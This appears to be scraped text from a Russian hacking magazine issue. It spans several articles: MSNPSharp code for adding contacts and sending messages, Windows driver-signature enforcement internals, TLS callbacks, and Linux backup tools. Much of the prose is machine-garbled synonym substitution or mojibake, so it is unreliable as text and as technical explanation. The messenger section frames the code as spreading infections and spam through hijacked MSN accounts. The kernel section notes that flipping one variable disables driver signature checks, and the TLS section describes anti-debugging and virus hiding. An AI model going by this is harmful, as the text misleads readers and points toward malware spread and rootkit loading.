жуть много, почему позволяется отведать сделать снова взлом. Проникая
бери компьютер, дозволено рисковать открыть MSN-аккаунты банальным
перебором всех почтовых ящиков, которые очищать во адресной книге. Если
черт знает что взломалось, ведь подключаемся через имени лохоюзера равным образом рассылаем
себя других лохоюзерам Сети. Известный бесспорно — от случая к случаю файлы приходят
через друзей, ведь их запускают стократ чаще. Итак, чтоб выслать кому-то
сообщение, ты да я попервоначалу должны предложить явиться его на частный роспись друзейтоварищей. Все, зачем касается адресной книги MSN, находится на классе
Nameserver мессенджера. Чтобы предложить явиться нового друга, вызываем
методика AddNewContact сервиса ContactService. Запутался? Проще нераздельно
однажды показать, нежели цифра однажды рассказать:
Messenger.Nameserver.ContactService.

Теперь что до том, равно как заразиться инвентарь контактов. Контакты находятся во свойстве ContactList, которое является хватает серьезным классом. Если
тебе нужны весь контакты, ведь обращайся ко коллекции All (ContactList.All).
Помимо сего не возбраняется узнать следующие типы контактов:
• Allowed — ðàçðåøåííûå êîíòàêòû;
• BlockedList — çäåñü ìû ìîæåì óâèäåòü þçåðîâ, êîòîðûõ
çàáëîêèðîâàëè.

Самый известный на Америке мессенджер
Âèííè-Ïóõ, ó êîòîðîãî âñå ïðåêðàñíî âõîäèò è âûõîäèò;
• Nameserver.AuthenticationError — àâòîðèçàöèÿ íå ïðîøëà;
• ConversationCreated — íà÷àòî îáùåíèå ñ óäàëåííûì
êëèåíòîì.

Достаточно поставить шлифовщик получи каждое событие, равно дозволено пускаться сочленение от сервером. Хотя подожди. Сначала нужно определить домашние
факты — те, со которыми ты да я подключаемся для серверу. У класса мессенджера снедать лиофильность Credentials, которое имеет того же названия тип.
У конструктора класса Credentials питаться неуд параметра — почтовый ларец
равно знак во чистом равным образом красивом виде. Итак, размер учетной записи,
из через которой я будем подсаживаться ко серверу сообщений, прописываем следующим образом:

Сам в области себя инвентарь отнюдь не синхронизируется не без; сервером, равным образом вмиг впоследствии
подключения всегда списки контактов будут пустыми. Дело во том, зачем буква
процедура происходит будет медленно. Если нужно напасть не без; сервера близкие контакты, ведь не грех обновить атрибут AutoSynchronize бери true:
messenger.Nameserver.AutoSynchronize=true;

Если а быстрота старта тебя особенно никак не волнует, так модифицирование
свойства AutoSynchronize не грех водворить во обработчике действие
ConnectionEstablished. Это совершенно доказательно — одновременно задним числом установки
подключения хронировать контакты.

ÎÁÙÅÍÈÅ

Когда пишущий сии строки вошли на систему, в таком случае кушать сотворилось история SignedIn, да мы от тобой
можем менять структура равным образом приниматься общаться. Чтобы показать, что-нибудь
твоя милость на волокуша равно подшофе ко общению, измени свое ситуация в online следующим образом:
messenger.Owner.Status=PresenceStatus.Online;

messenger.Credentials=new Credentials(
"qwerty");

Если твоя милость подцепился получи целое нужные нам обработчики событий да указал
учетную запись, не запрещается бросать тяжба коннекта для серверу методом
Connect();.

ÏÎÁÎËÒÀÅÌ

Разговоры посредь незнакомыми абонентами ультимативно запрещены, равно оный приказ представляет с лица реальное ниже достоинства интересах хакера. Чтобы кого-то родить держи грубый равно жестокий разговор, нужно
сперва командировать приглашение, равно только лишь разве твой invite приняли,
не запрещается высылать сообщения. Такой отчёт принуждён предупреждать
бесконтрольные рассылки заразы, которые происходят во классической
e-почте. Правда, в теории радикально по сути дела писать червя, тот или другой хорош расширяться согласно алгоритму Морриса, опять-таки постоянно хорошее
XÀÊÅÐ 00 /141/ 00

Разумеется, в целях спама да прочих сомнительных не без; точки зрения законности мероприятий модальность значения безвыгодный имеет — сведения дозволено посылать
равно присутствие PresenceStatus.Busy. Лично ми кажется, сколько из психологической
точки зрения занятость хоть сильнее предпочтительна — коли товарищ занят, же отправляет тебе что-то, твоя милость безвыгодный будешь заговаривать ко нему со
лишними вопросами что до том, что такое? сие равно зачем.
Теперь хозяйка отправка сообщения. Этот судебное дело незначительно побольше запутан.
Для сего нужно основать новое общение, следовать которое отвечает род
Conversation:
Conversation conversation=
messenger.CreateConversation();

Теперь прямо-таки дожидаемся, в некоторых случаях сработает казус
ConversationCreated. А во уж когда-никогда новое диалог создано, ты да я

017

CODING

Сайт библиотеки MSNPSharp

должны встретить на списке контактов человека, которому хотим отослать
послание, равно потребовать его нате разговор.
Допустим, что такое? messenger-аккаунт человека, которому ты да я хотим выслать сообщение, находится во строковой переменной MsnAccountTo:
private void messenger_ConversationCreated(
object sender, ConversationCreatedEventArgs e)
{
if (e.Initiator !=null)
{
foreach (MSNPSharp.Contact
contact in messenger.ContactList.All)
{
if (contact.Mail==MsnAccountTo)
{
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(
ContactJoined);
e.Conversation.Invite(contact);
return;
}
}
messenger.Nameserver.ContactService.AddNewContact
(MsnAccountTo);
}
}

Код банален — пишущий сии строки нетрудно ищем взаимосвязанность во списке всех, кого автор сих строк знаем.
Если чей-то почтовый ящичек совпадает со тем, кого наша сестра хотим приветливо равным образом
ласково полюбить, так вызываем сего человека получи разговор. Созданная
речь покоится во свойстве Conversation второго параметра события.
Мы должны подписаться сверху эпизод ContactJoined сего класса общения, с целью узнать, при случае вынутый ламер пожалуйста пообщаться:
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(ContactJoined);

А требование в данный объяснение делается вызовом метода Invite равно указанием ящика бедолаги:
e.Conversation.Invite(contact);

018

Тут нужно бытийствовать внимательным да аккуратным. Событие ConversationCreated может провоцироваться до некоторой степени раз. Я безграмотный понял, вместе с какого
перепуга сие происходит, да обстоятельство принимать бесспорно — нельзя не уничтожить повторяющуюся генерацию события. Это не запрещается сделать, например, вводя
дополнительную булеву переменную, которая полноте наставать близ
создании общения да гаситься позднее обработки события. Если аргумент неграмотный установлена, так не думать во внимание событие.
Но равно сие единаче малограмотный все. Теперь во недрах библиотеки опять-таки начинается
асинхроичный интересах нас процесс, по части завершению которого вызывается
происшествие ContactJoined. И чисто на нем пишущий сии строки ранее можем отослать пользователю сообщение. Следующий модель показывает, вроде отослать простое текстовое послание:
private void ContactJoined(object sender,
ContactEventArgs e)
{
TextMessage message=
new TextMessage(currentmessage);
(sender as Conversation).SendTextMessage(message);
}

В первой строке автор подготавливаем текстовое депеша ко отправке.
Оно приходится владеть субчик класса TextMessage. Конструктору сего класса
наша сестра плоско передаем строку текста.
Так во вкусе факт генерирует разряд Conversation, так стержневой параметр во вкусе
крат для него равным образом указывает, равно да мы со тобой можем его использовать. Например, для того
вызова метода SendTextMessage от целью непосредственной отправки
сообщения.
На сейчас созданном классе Conversation да пришедшем получи и распишись щебетанье удаленным клиентом, позволительно отправлять сколько-нибудь сообщений подряд. Если
юзер невыгодный на сети, Conversation совершенно одинаково хорош создан.

ÈÒÎÃÎ

Вот равно все. Еще единовременно повторю, в чем дело? MSN оказывается популярен во США —
чуть раз аз многогрешный видел контору, во которой использовали Skype, хотя рядом
ближайшем рассмотрении оказалось, что такое? квалифицированная ее программистов сидят на Петербурге. На диске для журналу твоя милость найдешь низкий
класс-помощник, кто упрощает работу не без; библиотекой равным образом сводит
отправку сообщений ко вызову сумме одного метода, буде далеко не вычислять конструктора, каковой вызывается автоматом присутствие инициализации объекта.
В большинстве простых ситуаций сего класса хорош достаточно. z
XÀÊÅÐ 00 /141/ 00

CODING
Санюта Эккерт

КОДЕРСКИЕ
ТИПСЫ
И
ТРИКСЫ
Ñïåöâûïóñê: òðþêè äëÿ (íå î÷åíü) íà÷èíàþùèõ
ñèñòåìùèêîâ

Õî÷åøü ñòàòü óâåðåííûì ïîëüçîâàòåëåì ñâîåãî êîìïüþòåðà? Ëåãêî
íàõîäèòü êíîïêó «Ïóñê» è çàïóñêàòü èãðó «Ñàïåð»? Õî÷åøü, ÷òîáû
òâîè äðóçüÿ çàâèñòëèâî ñìîòðåëè íà òåáÿ, ïîòîìó ÷òî òû íà÷àë
ïîëüçîâàòüñÿ çàâåòíûìè «ãîðÿ÷èìè êëàâèøàìè» Alt+TAB? Åñëè äà,
òî ñêàæè ìíå, çà÷åì òû âçÿë æóðíàë ñòàðøåãî áðàòà? Ðàçâå îí äëÿ
òåáÿ åãî ïîêóïàë? Îòäàé æóðíàë íåìåäëåííî!
Отдал? Хорошо. В этой статье да мы из тобой будем распиливать циркулярной
пилой такие вещи, в качестве кого Driver Signature Enforcement, полно озаботившую во свое эпоха драйверописателей, а как и TLS — Thread
Local Storage, этакого неотъемлемого равным образом скрытого соседа любого
PE-файла.

Êîå-÷òî î Driver Signature
Enforcement

Как известно, начиная со Windows Vista, ребята с Microsoft глубоко
озаботились загрузкой неподписанных (читай — чужих) драйверов на
систему (для Vista выговор изволь по части 04-битной версии). В первую цепочка сие
было сделано, наверное, на защиты системы через руткитов, основная
боевая пакет которых зависит через драйвера ядра. В результате сие привело для всевозможным проблемам, доставшимся системным разработчикам, занятым во разработке драйверов. Теперь с целью успешной загрузки
драйвера на Windows Vista/7 нужна была цифровая подпись, а ее нужно
было разбирать после немаленькие копейка у таких компаний, что Verisign не ведь — не то
Thawte.
Разработчики руткитов по поводу сих новостей легонько огорчились. Вместо того, воеже огорчаться, они начали выслеживать «левые» пути равно лазейки,
позволяющие отгружать неподписанные драйвера во систему. У них это,
традиционно, получилось, да первой середи них была наша ненаглядная
красота — Рутковска.
Я малограмотный буду бубенить тебе об сих способах, об них твоя милость тотально сможешь
догадаться на интернете. Вместо того, с тем убирать чужую рыбу, автор сих строк полегче
возьмем свою удочку да посмотрим, сколько позволено выудить с сего забавного механизма — Driver Signature Enforcement.
Его «сердцем» является здание сi.dll, которая, в качестве кого всегда, располагается во папке /%systemroot%/system32. Экспортирует симпатия следующие
функции:
XÀÊÅÐ 00 /141 00







CiCheckSignedFile
CiFindPageHashesInCatalog
CiFindPageHashesInSignedFile
CiFreePolicyInfo
CiGetPEInformation
CiInitialize
CiVerifyHashInCatalog

Самая интересная тогда ипостась — CiInitialize, возлюбленная импортируется
ядром кайфовый эпоха процесса инициализации системы, ее псевдокод выглядит будто таким образом:
VOID SepInitializeCodeIntegrity()
{
ULONG CiOptions;
{spipped...}
memset( g_CiCallbacks, 0, 0*sizeof ( SIZE_T ));
CiOptions=4|2;
if(KeLoaderBlock)
{
if(*(ULONG*)(KeLoaderBlock+84))
{
if(SepIsOptionPresent((KeLoaderBlock+84),
L"DISABLE_INTEGRITY_CHECKS"))
CiOptions=0;
if(SepIsOptionPresent((KeLoaderBlock+84),
L"TESTSIGNING"))
CiOptions |=8;
}
CiInitialize(CiOptions,(KeLoaderBlock+32),

019

глотать ли цифровая рукоприкладство у драйвера. CiInitialize) создает некие необходимые во дальнейшем ситуация для успешной загрузки системы. расшифровывать перевелся необходимости :)) и.sys nt!NtCreateSection nt!MmCreateSection nt!MiValidateImageHeader nt!SeValidateImageHeader nt!_g_CiCallbacks[0] ò. } } Самое интересное в этом месте то. SepInitializeCodeIntegrity (а вернее. грузящихся присутствие старте). Если ты да я полезем в глубину CiInitialize. воеже нагрузить драйвер. что-нибудь нужно короче предпринять — сие перепечатать во памяти один байт. что-нибудь в переводе получи общечеловеческий шлепалка соответствует «Windows cannot verify the digital signature of this file». Итак. от случая к случаю дьявол был создан. Если окончательный не равен NULL. Вывод: инспектирование того. учинить сие достаточно порядочно сложно. то увидим. после что-что со чистой совестью вернет STATUS_SUCCESS. Если же nt!g_CiCallbacks[0] короче пустым. ведь движение загрузки будет остановлен. проверит роль указателя nt!g_CiCallbacks[0]. ась? CiInitialize возвращает назад на ядро три указателя возьми функции: g_CiCallbacks[0]=CI!CiValidateImageHeader. g_CiCallbacks[2]=CI!CiQueryInformation. В час уничтожения потока можно XÀÊÅÐ 00 /141/ 00 . неравно симпатия установлена на TRUE. оно естественным путем используется программистами на многопоточных приложениях. Стек вызовов системных функций во этом случае на Vista/7 хорош смотреть следующим образом: nt!MmLoadSystemImage nt!MiObtainSectionForDriver nt!MiCreateSectionForDriver nt!MmCheckSystemImage 120 Windows Boot Manager вернул 0xc0000428 при проверке драйвера tcpip. Если умереть и безграмотный встать время этого процесса будут обнаружены ошибки. думаю. RTFM Что твоя милость знаешь в рассуждении TLS? Thread Local Storage. Правда. ведь цель выделит в памяти единодержавно байт. хорэ ли загружен программа на систему. Запомним сие да погляжу возьми настоящий хлыст вызовов функций на самом раннем этапе инициализации системы: nt!SepInitializeCodeIntegrity nt!SepInitializationPhase1 + 0x1a1 nt!SeInitSystem + 0x29 nt!Phase1InitializationDiscard + 0x7ce nt!Phase1Initialization + 0xd nt!PspSystemThreadStartup + 0x9e nt!KiThreadStartup + 0x19 Как тогда дозволяется увидеть. зависит всего просто-напросто через одной переменной. сиречь локальная мнемозина потока — наверное.CODING F8 возле загрузке Vista – отключим проверку численный подписи &g_CiCallbacks). находящихся во Boot Driver List (то есть. И разве кто-либо захочет выключить эту проверку — все. Если а аргумент nt!g_CiEnabled равна FALSE. самая документированная с самых недокуметированных возможностей Windows. который сия связка проверяет достоверность драйверов. Продолжаем исследовать работа загрузки драйверов на систему. g_CiCallbacks[1]=CI!CiValidateImageData. Рихтер на своей библии системного программирования приводит таковой модель — вместе с каждым обильно на TLS связывается дата и время. Делает возлюбленная сие следующим образом: Сначала согласен осмотр переменной nt!g_CiEnabled (ее смысл. ни nt!g_CiCallbacks малограмотный экспортируются ядром равным образом откопать их будет проблематично. оттого ась? ни nt!g_CiEnabled. скопирует тама индикатор бери личный узловой аргумент. Все! Вот таким вот нехитрым способом WIndows Vista / 0 проверяет наличествование да достоверность численный подписи. CI!CiValidateImageData Интерес пользу кого нас представляет SeValidateImageHeader — симпатия проверяет. так симпатия вернет модальность 0xc0000428. в таком случае вызовет эту функцию равным образом вернет управление.å.

crackme да прочих программ. От сего симпатия становится еще больше продвинутым пользователем :). Это значит. что конструкт процесса вполне создан. которые связаны враз равно из программой на целом. В частности. да истинно пребудет из тобой Сила! z 121 . которая грузится открыто от затребование LoadLibrary(Ex). Например. сие позволяет найти существование отладчика или скрытно воплотить в жизнь отдельные люди действия. который коэффициент на глобальном массиве — его? Да. Каждый элемент массива дружно не без; его содержимым соответствует отдельному потоку.asp). объявленных на правах __declspec(thread) в библиотеке. что ключевое обещание __declspec(thread) имеет отдельные люди ограничения. тот или иной дозволительно задействовать набором функций. Пространство глобальных переменных к потока выделяется закачаешься сезон выполнения. положим движение владеет некоторым массивом.Точно. защит. кабы тебя интересует эксплуатация TLS на качестве антиотладочного приема — подробности читай во отличной статье К. Если библиотека DLL объявляет любые нелокальные эмпирика иначе объекты как __declspec( thread ). читай ][. расположенную в памяти (в одной с системных DLL). А аюшки? делает пропиханный пользователь? Берет настройщик да ковыряет по сию пору подряд. Некоторые вирусы внедряются до невероятности толком модифицирования просто-напросто четырех байт — указателя сверху TLS-таблицу. можно передать функции потока ThreadProc параметр на виде индекса… же это все известные стороны медали. что.. возлюбленный быстро сможет добавить другие калбэки вот пора исполнения. Или общий невыгодный обращают внимания для вариант directory table. неравно библиотека DLL загружается не без; через функции LoadLibrary. и со отдельным обильно на частности.xakep. поэтому размер данного пространства определяется. во ход которого целый короб существовал. а антивирусы таких вирусов неграмотный обнаруживают. про что присутствие их объявлении используется __declspec(thread) . далеко не выходит. который произнесение этой статьи смогло учинить тебя продвинутым пользователем компьютера. Откуда полчище узнает. Отвечу: рядом использовании TLS на своих грязных целях следует помнить об одной неочевидной принадлежности — на операционках предварительно Windows Vista утилизация переменных. Что никак не лежит возьми поверхности TLS? Что мы об нем отнюдь не знаем? Реализация механизма TLS на Windows предусматривает двушничек варианта — явный. Ты можешь спросить: «В нежели а репорт между ними?». вынуждают эксплуатнуть TLS. равным образом второй. идеже находится движок получай команду передачи управления бери shell-код. находящихся во сфере наших не без; тобой общих интересов. а вот и все требований всех статически компонуемых библиотек DLL. так чтобы расположить TLS. импортируемых kernel32 (TlsGetValue. Данила-мастер. Blacklight’s TLS callback пытается обмануть отладчик. Конечно. Поэтому на таких случаях на библиотеках DLL нелишне пускать в дело APIфункции TLS. неграмотный из в чем дело? позволяется заключить каменный цветок? посчитать время. При использовании функции LoadLibrary безвыгодный существует способа расширения сего пространства. начинающиеся не без; создания callback таблицы TLS (Thread Local Storage). В общем..ru/magazine/xa/118/080/1. некоторый позволяет строить да истощить где-то называемые локальные переменные потока. Уф. надеюсь. После загрузки библиотеки DLL из через функции LoadLibrary возможен нарушение на системе некоторый раз. внятно разъяснил. кабы у тебя установлен единолично калбэк. в надежде не позволить объявление локальных переменных потока вместе с ключевым одно слово __declspec (thread). Но ась? не без; того? Как TLS дозволено истощить во контексте компьютерной безопасности? А вона так! PE-формат поддерживает функции обратного вызова (TLS-callback). по-под которую возлюбленная заточена. в некоторых случаях адрес ссылается на нелокальные материал __declspec( thread ). образуя копию главного процесса (fork) вплоть до того. закончится ошибкой Access Violation. Касперски «Исчерпывающее администратор до приготовлению да взлому TLS» (http:// www. TlsAlloc да TlsFree). автоматически вызываемые системой по передачи управления сверху точку входа. TLS используется на большом количестве протекторов. Сценарии. Почему? Все деятельность во том. Ну что. Blacklight используют кое-какие антиотладочные приемы. вирусов. XÀÊÅÐ 00 /141 00 Çàêëþ÷åíèå Будем надеяться. TlsSetValue. Если PE-файл имеет свои калбэки. такие вроде TlsAlloc. исходя с расчетов требований приложения. в таком случае сие может повергнуть ко сбою защиты возле динамической загрузке. подобная умелость внедрения работает лишь получи и распишись праздник версии операционной системы. где есть данные. Кстати. двигайся вперед. неявный. они могут изменять таблицу TLS нет слов эпоха исполнения.

ñîçäàòü áýêàï â âèäå LiveCD è «ðàçâåðíóòü» ýòîò áýêàï íà âñåõ îñòàëüíûõ êîìïàõ ñåòè. òû íàñòðîèë ñâîþ ñèñòåìó. Ïðåäïîëîæèì. Ìû óáèâàåì âîò ñêîëüêî çàéöåâ ñðàçó: • Ñîçäàåì ñðåäñòâî äëÿ âîññòàíîâëåíèÿ ñèñòåìû. В этой статье я поговорим о средствах резервного копирования чтобы твоего любимого тукса. Ïîëüçîâàòåëè è íà÷àëüñòâî áóäóò òåáå áëàãîäàðíû çà ñòîëü îïåðàòèâíîå «âîñêðåøåíèå» ñåðâåðà. äà. ïëþñ îäèí ëèøíèé ðåáóò. ýòî äîâîëüíî óäîáíî. è êîìïüþòåðû íà÷àëüñòâà — ó íèõ äîëæíà áûòü ìîùíàÿ âèäåîêàðòà :)).SYN/ACK Денис Колисниченко ëèøü áû èõ ðàçìåð íå ïðåâûñèë ðàçìåðà DVD-äèñêà. òî. Ñðåäñòâà ñîçäàíèÿ LiveCD ïîçâîëÿþò òàêæå ñîçäàòü è çàãðóçî÷íóþ ôëåøêó. ïîòîìó ÷òî òåáå íóæíî áóäåò ñîçäàòü íåñêîëüêî êîïèé LiveCD. òî òåáå íå÷åãî áåñïîêîèòüñÿ. а LiveCD/DVD. Íàñòðîèòü îäèí êîìïüþòåð. À âðåìÿ èäåò.6 Ãá íà 01 êîìïüþòåð ñåòè.). ðàáîòàþùèõ ïîä óïðàâëåíèåì Windows è FreeBSD.ru «Живой» бэкап линуксового сервера ОБЗОР СРЕДСТВ ДЛЯ РЕЗЕРВНОГО КОПИРОВАНИЯ И СОЗДАНИЯ LIVEDVD/LIVEUSB Все автор помним (любим равно скорбим) об подобру-поздорову привидении ото Нортона — Norton Ghost. À òàê òû íàñòðîèøü ýòè 00 êîìïîâ ïðèìåðíî çà ÷åòûðå ÷àñà. КАКИЕ СРЕДСТВА МЫ БУДЕМ РАССМАТРИВАТЬ? Ñàìûì ìîùíûì ñðåäñòâîì äëÿ êëîíèðîâàíèÿ òâîåãî òóêñà ÿâëÿåòñÿ Clonezilla. ïîòîìó ÷òî îò òåáÿ òðåáóåòñÿ ââîä âñåãî îäíîé êîìàíäû). ýòî áóäåò LiveDVD. ïîäíÿë âñå ñåòåâûå ñëóæáû. Îïÿòü âñå çàíîâî íàñòðàèâàòü? Åñëè òû íàêàíóíå ñîçäàë LiveCD. Îäíîçíà÷íî âðåìåíè áóäåò ïîòðà÷åíî áîëüøå.geekconnection. Ýòîò ïðîäóêò ìîæåò íå òîëüêî ñîçäàòü LiveCD. ÷òî òåáå íóæíî íàñòðîèòü êàæäûé íîâûé êîìïüþòåð. ðàçâå ÷òî. Более того. Áåç LiveCD òû áû ïîòðàòèë ïîëòîðà ÷àñà íà êàæäûé êîìïüþòåð. Ìîæíî êîïèðîâàòü è ïîëüçîâàòåëüñêèå äàííûå èç /home. В мире Windows его позволено подсчитывать незаменимым (хотя в конкурентах недостатка несть — прим. Ïóñòü íàñòðîéêà îäíîãî êîìïüþòåðà çàéìåò ïîëòîðà ÷àñà (óñòàíîâêà ñèñòåìû + íàñòðîéêà). Íàøà öåëü — ðåçåðâíîå êîïèðîâàíèå ñèñòåìû. çàãðóçèëñÿ ñ LiveCD (êîíå÷íî. ìîæíî îãðàíè÷èòüñÿ óòèëèòîé Remastersys Backup (http://www. Clonezilla ìîæåò èñïîëüçîâàòüñÿ äëÿ áýêàïà êîìïüþòåðîâ. è ñðàçó áóäåò íàñòðîåíî N êîìïüþòåðîâ. • Âîçìîæíîñòü ñîçäàíèÿ LiveUSB — çàãðóçî÷íàÿ æèâàÿ ôëåøêà ïîíàäîáèòñÿ äëÿ âîññòàíîâëåíèÿ/êëîíèðîâàíèÿ îïåðàöèîíêè íåòáóêà è äðóãèõ êîìïîâ. çàðïëàòà íà÷èñëÿåòñÿ! È åùå — ñîçäàííûå «êëîíû» ñèñòåìû ìîæíî èñïîëüçîâàòü â áóäóùåì. ÷òî áýêàï â âèäå LiveCD ìîæåò èñïîëüçîâàòüñÿ òîëüêî äëÿ êîïèðîâàíèÿ/âîññòàíîâëåíèÿ ôàéëîâ ñàìîé ñèñòåìû.  èòîãå âñå êîìïû áûëè íàñòðîåíû âñåãî çà 00 ìèíóò. ýòà óòèëèòà ðàññ÷èòàíà òîëüêî íà Debian è Ubuntu (à òàêæå íà XÀÊÅÐ 00 /141/ 00 . 00! Ìîæíî ïîñòóïèòü ïðîùå. org ìîæíî íàéòè ñëåäóþùóþ èíôîðìàöèþ: çà 00 ìèíóò Clonezilla SE ðàçâåðíóë ïî ñåòè îáðàç 0. 00. Êîãäà ïðåäïðèÿòèå ïîêóïàåò êîìïüþòåðíûé ïàðê. ÷òî òû ñîçäàë îáû÷íûé áýêàï ñ ïîìîùüþ tar/tgz. Êðîìå òîãî. Óäîáíî? Äóìàþ. ãäå íåò DVD -ïðèâîäà. Îñòàëüíîå âðåìÿ ìîæíî äåëàòü âèä. 00 êîìïîâ=15 ÷àñîâ (äâà ðàáî÷èõ äíÿ). È âñå! Íà âñþ ýòó îïåðàöèþ áóäåò ïîòðà÷åíî ïîë÷àñà. Äà. ÷òîáû òû ñìîã îäíîâðåìåííî óñòàíàâëèâàòü ñèñòåìó íà íåñêîëüêî êîìïüþòåðîâ. ãäå ÷èñëî N çàâèñèò îò êîëè÷åñòâà èìåþùèõñÿ áîëâàíîê. îòðåäàêòèðîâàë èõ êîíôèãè. íî îá ýòîì ïîçæå. À òåïåðü ïðåäñòàâü. совершенно рассматриваемые деньги позволяют образовать малограмотный просто-напросто резервную копию системы. ñîçäàíèå LiveCD — åùå ìèíóò 00 (òóò âñå çàâèñèò îò ñïîñîáíîñòåé êîìïüþòåðà. çà÷åì àäìèíó ñðåäñòâà äëÿ ñîçäàíèÿ LiveCD. ñåðâåðû — îíè äîëæíû áûòü ìîùíåå. ïîòîì âðåìÿ íà âîññòàíîâëåíèå áýêàïà. êàê ïðàâèëî. íî ïî ñòàðèíêå ìû çäåñü è äàëåå áóäåì íàçûâàòü åãî LiveCD) è óñòàíîâèë ñèñòåìó âìåñòå ñî âñåìè ïàðàìåòðàìè íà íîâûé âèíò. ЗАЧЕМ НУЖНО ВСЕ ЭТО? Äëÿ íà÷àëà îïðåäåëèìñÿ. Òåáå íóæíî ìèíèìóì 00 ìèíóò íà óñòàíîâêó ñèñòåìû. À èõ ìîæåò áûòü 00. Íî çàâòðà èç-çà î÷åðåäíîãî ïåðåïàäà íàïðÿæåíèÿ ñãîðåë âèíò. âñå êîìïüþòåðû îäíîòèïíûå (èñêëþ÷åíèå ñîñòàâëÿþò. Çàòåì 122 åùå ìèíóò 00 îæèäàíèÿ. Âîò òåïåðü ïðåäñòàâü. èìåííî íà «áîëâàíêè». Ïðàâäà. ÷òî íàñòðàèâàåøü êîìïû. Õîòÿ ìîæíî èñïîëüçîâàòü äâóõñëîéíûå äèñêè (äâóõñòîðîííèå èñïîëüçîâàòü íå óäîáíî). íî è ðàçâåðíóòü ñèñòåìó ïî ñåòè. Ïðàâäà. äëÿ òàêîé ñåòåâîé óñòàíîâêè íóæíî ðàçâåðíóòü ñïåöèàëüíûé ñåðâåð. çàòåì çàïèñü îáðàçà íà áîëâàíêè. Íå íóæíî äóìàòü. è íè÷åãî íå äåëàòü. åñëè êîìïüþòåðíûé ïàðê áóäåò ðàñøèðÿòüñÿ. • Ñîçäàåì ñðåäñòâî äëÿ êëîíèðîâàíèÿ ñèñòåìû. Çàìåíèë âèíò. íî ïðè÷åì çäåñü LiveCD? Îêàçûâàåòñÿ. Åñëè òåáå íå íóæíî òàêîå ìîùíîå ñðåäñòâî. Íà ñàéòå ðàçðàáîò÷èêîâ http://clonezilla. ÷òî ïîçâîëèò óâåëè÷èòü îáúåì ðåçåðâèðóåìîé èíôû.org/remastersys/). ред.

òî Clonezilla áóäåò èñêàòü åãî íà ýòîì ðàçäåëå. Ïåðâûì äåëîì óñòàíîâèì Remastersys. restoredisk — äëÿ âîññòàíîâëåíèÿ îáðàçà äèñêà íà ëîêàëüíûé äèñê. êîòîðàÿ íàïðÿìóþ ðàáîòàåò ñ óñòðîéñòâàìè. óòèëèòà mklivecd (ïîäîáíà Remastersys Backup) èñïîëüçóåòñÿ äëÿ ñîçäàíèÿ LiveCD íà áàçå Mandriva. Âîò.list: sudo nano /etc/apt/sources. íî òàê êàê ðàñêëàäêó èçìåíÿòü íàì íå íóæíî (à çà÷åì?). êîòîðûé íóæíî èñïîëüçîâàòü. çàïóñêàåòñÿ ïîä óïðàâëåíèåì ýòîé îïåðàöèîííîé ñèñòåìû è ñîçäàåò ISO-îáðàç ñèñòåìû. óñòàíàâëèâàåøü Remastersys. Âûáåðè ðåæèì device-image: ñîçäàíèå ôàéëà îáðàçà ðàçäåëà. ïîä êàêîé îïåðàöèîííîé ñèñòåìîé ðàáîòàåò êîìïüþòåð. saveparts — äëÿ ñîõðàíåíèÿ îäíîãî èëè íåñêîëüêèõ ðàçäåëîâ äèñêà. XÀÊÅÐ 00 /141/ 00 7. Òû óâèäèøü ïðîöåññ çàãðóçêè Debian — òóò âñå êàê îáû÷íî. ìîæíî âûáðàòü êîìàíäó Other modes of Clonezilla live è âûáðàòü äðóãîé ðåæèì çàãðóçêè Clonezilla. both — áóäóò ñîçäàíû îáà ôàéëà. ðàçäåëàìè) íàïðÿìóþ. òî íà ýòîò ðàçäåë îí áóäåò ñîõðàíåí. 5. Ðàññìîòðåòü àáñîëþòíî âñå ïîäîáíûå óòèëèòû ìû íå ìîæåì — æóðíàë-òî âåäü íå ðåçèíîâûé. ÷òîáû íå ðàçâåðíóòü îáðàç ðàçäåëà íà âåñü äèñê — ïîòåðÿåøü îñòàëüíûå ðàçäåëû! 11. îñíîâàííûå íà Debian). Äàëåå íóæíî âûáðàòü ðàçäåë. íóæíî ïðîñòî ïîäîæäàòü. Äàëåå íóæíî âûáðàòü. Âûáåðè local_ dev. restoreparts — äëÿ âîññòàíîâëåíèÿ îáðàçà ðàçäåëà. Åñëè òû ñîçäàåøü îáðàç. ïîêà íå ïðåäâèäèòñÿ. Ïîðÿäîê ðàáîòû ñ Remastersys ñëåäóþùèé: òû íàñòðàèâàåøü ñâîþ ñèñòåìó. Êîìàíäà savedisk èñïîëüçóåòñÿ äëÿ ñîõðàíåíèÿ âñåãî äèñêà. Íóæíî âûáðàòü êîìàíäó Clonezilla live. Äàëåå íóæíî âûáðàòü ÿçûê. åñëè òû èñïîëüçóåøü. íà êîòîðîå íóæíî ðàçâåðíóòü îáðàç. ïîä óïðàâëåíèåì êîòîðîé îíà çàïóùåíà. 4. êîòîðûé ïîòîì íóæíî áóäåò çàïèñàòü íà áîëâàíêó. ñîçäàåøü ISO-îáðàç. Îòêðîé ôàéë sources. òî íóæíî òàêæå âûáðàòü ðåæèì: iso — áóäåò ñîçäàí îáðàç äëÿ çàïèñè íà DVD. ðàáîòàþùèé ïîä óïðàâëåíèåì Debian èëè Ubuntu. ñêàæåì. Ëþáèòåëÿì Slackware ïîäîéäåò ñêðèïò Linux Live (http://www. Ââîäèì óñòðîéñòâî (èìåíà óñòðîéñòâ ñîîòâåòñòâóþò èìåíàì óñòðîéñòâ â Linux). êîìàíäà recovery-iso-zip èñïîëüçóåòñÿ äëÿ ñîçäàíèÿ «æèâîãî» äèñêà âîññòàíîâëåíèÿ. Åñëè òû âûáðàë êîìàíäó âîññòàíîâëåíèÿ îáðàçà. 6. zip — îáðàç äëÿ çàïèñè íà LiveUSB. Ïîäîáíûå óòèëèòû ìîæíî íàéòè è äëÿ äðóãèõ äèñòðèáóòèâîâ.linuxlive. äëÿ ñîçäàíèÿ/âîññòàíîâëåíèÿ áýêàïà íóæíî âûïîëíèòü ñëåäóþùèå äåéñòâèÿ: 1. Èòàê. Åñëè òû âûáðàë êîìàíäó recovery-iso-zip äëÿ ñîçäàíèÿ LiveDVD/USB. ãäå áóäóò õðàíèòüñÿ îáðàçû. REMASTERSYS BACKUP: БЭКАП ДЛЯ DEBIAN/UBUNTU  îòëè÷èå îò Clonezilla. ÷òî îçíà÷àåò ëîêàëüíîå óñòðîéñòâî. Âîò è âñå! Êàê âèäèøü. çàãðóçî÷íîå ìåíþ ïðåäñòàâëåíî íèæå. òî äàëåå íóæíî âûáðàòü îáðàç.org). çàïóñêàåøü Remastersys. ñåé÷àñ ìû ðàññìîòðèì ëèøü îäèí èç 